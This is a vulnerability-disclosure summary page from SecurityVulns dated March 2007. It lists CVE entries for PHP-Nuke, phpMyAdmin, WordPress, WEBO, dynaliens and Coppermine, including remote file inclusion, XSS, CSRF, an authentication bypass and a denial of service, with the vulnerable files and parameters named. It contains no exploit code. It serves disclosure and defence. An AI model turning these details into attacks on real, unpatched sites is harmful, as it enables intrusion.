Computer Security
[EN] securityvulns.ru no-pyccku


Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published:09.03.2007
Source:
SecurityVulns ID:7361
Type:remote
Threat Level:
5/10
Description:PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.
Affected:WORDPRESS : WordPress 2.1
 PHPNUKE : PHP-Nuke 8.0
 WEBO : Web Organizer 1.0
 PHPMYADMIN : phpMyAdmin 2.10
 DYNALIENS : dynaliens 2.1
CVE:CVE-2007-1520 (The cross-site request forgery (CSRF) protection in PHP-Nuke 8.0 and earlier does not ensure the SERVER superglobal is an array before validating the HTTP_REFERER, which allows remote attackers to conduct CSRF attacks.)
 CVE-2007-1519 (Cross-site scripting (XSS) vulnerability in modules.php in PHP-Nuke 8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the query parameter in a search operation in the Downloads module, a different product than CVE-2006-3948.)
 CVE-2007-1416 (PHP remote file inclusion vulnerability in createurl.php in JCcorp (aka James Coyle) URLshrink allows remote attackers to execute arbitrary PHP code via a URL in the formurl parameter.)
 CVE-2007-1414 (Multiple PHP remote file inclusion vulnerabilities in Coppermine Photo Gallery (CPG) allow remote attackers to execute arbitrary PHP code via a URL in the (1) cmd parameter to (a) image_processor.php or (b) picmgmt.inc.php, or the (2) path parameter to (c) include/functions.php, (d) include/plugin_api.inc.php, (e) index.php, or (f) pluginmgr.php.)
 CVE-2007-1395 (Incomplete blacklist vulnerability in index.php in phpMyAdmin 2.8.0 through 2.9.2 allows remote attackers to conduct cross-site scripting (XSS) attacks by injecting arbitrary JavaScript or HTML in a (1) db or (2) table parameter value followed by an uppercase </SCRIPT> end tag, which bypasses the protection against lowercase </script>.)
 CVE-2007-1391 (PHP remote file inclusion vulnerability in modules/abook/foldertree.php in Leo West WEBO (aka weborganizer) 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the baseDir parameter.)
 CVE-2007-1390 (Multiple cross-site scripting (XSS) vulnerabilities in dynaliens 2.0 and 2.1 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) recherche.php3 or (2) ajouter.php3.)
 CVE-2007-1389 (dynaliens 2.0 and 2.1 allows remote attackers to bypass authentication and perform certain privileged actions via a direct request for (1) validlien.php3 (2) supprlien.php3 (3) supprub.php3 (4) validlien.php3 (5) confsuppr.php3 (6) modiflien.php3, or (7) confmodif.php3 in admin/.)
 CVE-2007-1325 (The PMA_ArrayWalkRecursive function in libraries/common.lib.php in phpMyAdmin before 2.10.0.2 does not limit recursion on arrays provided by users, which allows context-dependent attackers to cause a denial of service (web server crash) via an array with many dimensions. NOTE: it could be argued that this vulnerability is caused by a problem in PHP (CVE-2006-1549) and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in phpMyAdmin.)
Original documentdocumentRaeD Hasadya, Remote File Include In Script Coppermine Photo Gallery (09.03.2007)
 documentc_r_ck_(at)_hotmail.com, Lazarus Guestbook (admin.php)Remote File Include Expliot (09.03.2007)
 documentsn0oPy.team_(at)_gmail.com, dynaliens v2.0/v2.1 bypass admin authentification + XSS (09.03.2007)
 documentalfa_(at)_virtuax.be, xss in phpmyadmin >=2.8.0 and < 2.10.0 (09.03.2007)
 documentr00t2000_(at)_hush.com, Word Press Sensitive Directory exposure (SQL) (09.03.2007)
 documentRaeD Hasadya, Remote File Include In Script copyright (c) James Coyle; JCcorp (09.03.2007)
 documenterdc_(at)_echo.or.id, [ECHO_ADV_67$2007] WEBO (Web Organizer) <= 1.0 (baseDir) Remote File Inclusion Vulnerability (09.03.2007)
 documentRaeD Hasadya, XSS In Script deviantART (09.03.2007)
 documentOmid, Sql injection in WordPress 2.1.2 (09.03.2007)
 documentascii, Php Nuke POST XSS on steroids (09.03.2007)
Files:PHP-Nuke POST crossite scripting PoC

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod